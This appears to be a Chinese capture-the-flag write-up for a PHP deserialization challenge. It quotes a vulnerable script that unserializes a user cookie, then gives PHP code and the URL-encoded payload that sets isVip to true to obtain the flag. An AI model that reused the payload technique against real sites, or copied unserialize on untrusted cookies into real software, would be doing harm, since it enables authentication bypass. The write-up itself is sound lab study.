- 代码审计
```php <?php errorreporting(0); highlightfile(__FILE); include(‘flag.php’);
class ctfShowUser{ public $username=’xxxxxx’; public $password=’xxxxxx’; public $isVip=false;
public function checkVip(){return $this->isVip;}public function login($u,$p){return $this->username===$u&&$this->password===$p;//这里没有返回isVIP的值}public function vipOneKeyGetFlag(){if($this->isVip){global $flag;echo "your flag is ".$flag;}else{echo "no vip, no flag";}}
}
$username=$_GET[‘username’]; $password=$_GET[‘password’];
前面定义类和上一题类似
if(isset($username) && isset($password)) //对传递的参数进行校验是否有值 { //对接收的cookie值进行反序列化赋值给$user $user = unserialize($_COOKIE[‘user’]); //调用成员函数进行校验 if($user->login($username,$password)){ if($user->checkVip()){ $user->vipOneKeyGetFlag(); } }else{ echo “no vip,no flag”; } }
2. 简单分析下,代码首先校验`GET`传递的参数是否有值,然后对接收到`cookie`值进行反序列还原成对象,然后调用成员函数对对象中`username`和`password`值与传递的参数进行校验,然后校验`isVip`是否为真,输出flag
```php
#所以这里我们进行序列化赋值给cookie
<?php
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
#必须设置$isVip为真,上面代码没有返回值
public $isVip=true;
}
$a=new ctfShowUser();
#需要对值进行url编码,cookie无法对分号进行处理
echo urlencode(serialize($a));
?>
#输出
#O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
利用工具进行提交
若有收获,就点个赞吧
0 人点赞
